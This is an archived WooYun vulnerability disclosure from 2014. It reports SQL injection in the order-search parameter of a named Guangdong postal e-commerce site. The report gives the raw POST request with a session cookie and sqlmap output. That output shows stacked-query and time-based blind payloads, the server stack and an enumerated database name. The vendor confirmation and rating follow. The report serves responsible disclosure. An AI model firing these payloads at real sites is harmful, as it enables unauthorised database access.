乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-28: 细节已通知厂商并且等待厂商处理中 2014-08-29: 厂商已经确认,细节仅向厂商公开 2014-09-08: 细节向核心白帽子及相关领域专家公开 2014-09-18: 细节向普通白帽子公开 2014-09-28: 细节向实习白帽子公开 2014-10-12: 细节向公众公开
~~~
POST请求
POST /Member/MyOrder.aspx HTTP/1.1Host: www.183.gd.cnProxy-Connection: keep-aliveContent-Length: 897Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.183.gd.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36Content-Type: application/x-www-form-urlencodedDNT: 1Referer: http://www.183.gd.cn/Member/MyOrder.aspxAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4Cookie: ASP.NET_SessionId=mevwmp55ggdjsfqabfoylvmn; CNZZDATA2278430=cnzz_eid%3D1100403919-1409196452-http%253A%252F%252Fwww.gdpost.com.cn%252F%26ntime%3D1409196452; PostWeb183=LoginName=li; ASPSESSIONIDQARRBSDD=EIIHPCBDMKFPEJJAGCNIGOAP; CNZZDATA2278111=cnzz_eid%3D1957482220-1409196478-http%253A%252F%252Fwww.183.gd.cn%252F%26ntime%3D1409196478__VIEWSTATE=dDwxOTUxODc0ODExO3Q8O2w8aTwxPjs%2BO2w8dDw7bDxpPDE%2BO2k8NT47aTw2PjtpPDE0PjtpPDE1Pjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PDtsPGk8MD47aTwyPjs%2BO2w8dDxwPGw8VmlzaWJsZTs%2BO2w8bzxmPjs%2BPjs7Pjt0PDtsPGk8MD47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PHA8cDxsPFRleHQ7PjtsPOasoui%2FjuaCqO%2B8jOaCqOeahOS8muWRmOe6p%2BWIq%2BS4ujog5LiA6Iis5Lya5ZGYITs%2BPjs%2BOzs%2BOz4%2BOz4%2BOz4%2BOz4%2BOz4%2BO3Q8QDA8cDxwPGw8XyFEYXRhU291cmNlSXRlbUNvdW50O18hSXRlbUNvdW50O1BhZ2VDb3VudDtEYXRhS2V5czs%2BO2w8aTwtMT47aTwtMT47aTwwPjtsPD47Pj47Pjs7Ozs7Ozs7Ozs%2BOzs%2BO3Q8cDxwPGw8VGV4dDtWaXNpYmxlOz47bDzlj4vmg4Xmj5DnpLrvvJrmgqjmmoLml7bov5jmsqHmnInlho3mrKHmlK%2Fku5jorqLljZXvvIE7bzx0Pjs%2BPjs%2BOzs%2BO3Q8QDA8Ozs7Ozs7Ozs7Oz47Oz47dDxwPHA8bDxUZXh0O1Zpc2libGU7PjtsPOWPi%2BaDheaPkOekuu%2B8muaCqOaaguaXtui%2FmOayoeacieiuouWNle%2B8gTtvPHQ%2BOz4%2BOz47Oz47Pj47Pj47PstSsKsQgtOOG9rNWzluFgfQejIa&txtOrder=123&btnSearch=%CB%D1+%CB%F7
sqlmap:
Place: POSTParameter: txtOrder Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __VIEWSTATE=dDwxOTUxODc0ODExO3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDE+O2k8NT47aTw2PjtpPDE0PjtpPDE1Pjs+O2w8dDw7bDxpPDA+Oz47bDx0PDtsPGk8MD47aTwyPjs+O2w8dDxwPGw8VmlzaWJsZTs+O2w8bzxmPjs+Pjs7Pjt0PDtsPGk8MD47PjtsPHQ8O2w8aTwwPjs+O2w8dDw7bDxpPDA+Oz47bDx0PHA8cDxsPFRleHQ7PjtsPOasoui/juaCqO+8jOaCqOeahOS8muWRmOe6p+WIq+S4ujog5LiA6Iis5Lya5ZGYITs+Pjs+Ozs+Oz4+Oz4+Oz4+Oz4+Oz4+O3Q8QDA8cDxwPGw8XyFEYXRhU291cmNlSXRlbUNvdW50O18hSXRlbUNvdW50O1BhZ2VDb3VudDtEYXRhS2V5czs+O2w8aTwtMT47aTwtMT47aTwwPjtsPD47Pj47Pjs7Ozs7Ozs7Ozs+Ozs+O3Q8cDxwPGw8VGV4dDtWaXNpYmxlOz47bDzlj4vmg4Xmj5DnpLrvvJrmgqjmmoLml7bov5jmsqHmnInlho3mrKHmlK/ku5jorqLljZXvvIE7bzx0Pjs+Pjs+Ozs+O3Q8QDA8Ozs7Ozs7Ozs7Oz47Oz47dDxwPHA8bDxUZXh0O1Zpc2libGU7PjtsPOWPi+aDheaPkOekuu+8muaCqOaaguaXtui/mOayoeacieiuouWNle+8gTtvPHQ+Oz4+Oz47Oz47Pj47Pj47PstSsKsQgtOOG9rNWzluFgfQejIa&txtOrder='; WAITFOR DELAY '0:0:5'--&btnSearch=%CB%D1 %CB%F7 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __VIEWSTATE=dDwxOTUxODc0ODExO3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDE+O2k8NT47aTw2PjtpPDE0PjtpPDE1Pjs+O2w8dDw7bDxpPDA+Oz47bDx0PDtsPGk8MD47aTwyPjs+O2w8dDxwPGw8VmlzaWJsZTs+O2w8bzxmPjs+Pjs7Pjt0PDtsPGk8MD47PjtsPHQ8O2w8aTwwPjs+O2w8dDw7bDxpPDA+Oz47bDx0PHA8cDxsPFRleHQ7PjtsPOasoui/juaCqO+8jOaCqOeahOS8muWRmOe6p+WIq+S4ujog5LiA6Iis5Lya5ZGYITs+Pjs+Ozs+Oz4+Oz4+Oz4+Oz4+Oz4+O3Q8QDA8cDxwPGw8XyFEYXRhU291cmNlSXRlbUNvdW50O18hSXRlbUNvdW50O1BhZ2VDb3VudDtEYXRhS2V5czs+O2w8aTwtMT47aTwtMT47aTwwPjtsPD47Pj47Pjs7Ozs7Ozs7Ozs+Ozs+O3Q8cDxwPGw8VGV4dDtWaXNpYmxlOz47bDzlj4vmg4Xmj5DnpLrvvJrmgqjmmoLml7bov5jmsqHmnInlho3mrKHmlK/ku5jorqLljZXvvIE7bzx0Pjs+Pjs+Ozs+O3Q8QDA8Ozs7Ozs7Ozs7Oz47Oz47dDxwPHA8bDxUZXh0O1Zpc2libGU7PjtsPOWPi+aDheaPkOekuu+8muaCqOaaguaXtui/mOayoeacieiuouWNle+8gTtvPHQ+Oz4+Oz47Oz47Pj47Pj47PstSsKsQgtOOG9rNWzluFgfQejIa&txtOrder=' WAITFOR DELAY '0:0:5'--&btnSearch=%CB%D1 %CB%F7---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322back-end DBMS: Microsoft SQL Server 2005
web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322back-end DBMS: Microsoft SQL Server 2005current user is DBA: Falseavailable databases [1]:[*] 183dbnew
不知道
危害等级:中
漏洞Rank:8
确认时间:2014-08-29 11:00
非常感谢您的报告。报告中的问题已确认并复现,典型的SQL注射漏洞。影响的数据:中攻击成本:中造成影响:中综合评级为:中,rank:8正在联系相关网站管理单位处置。
暂无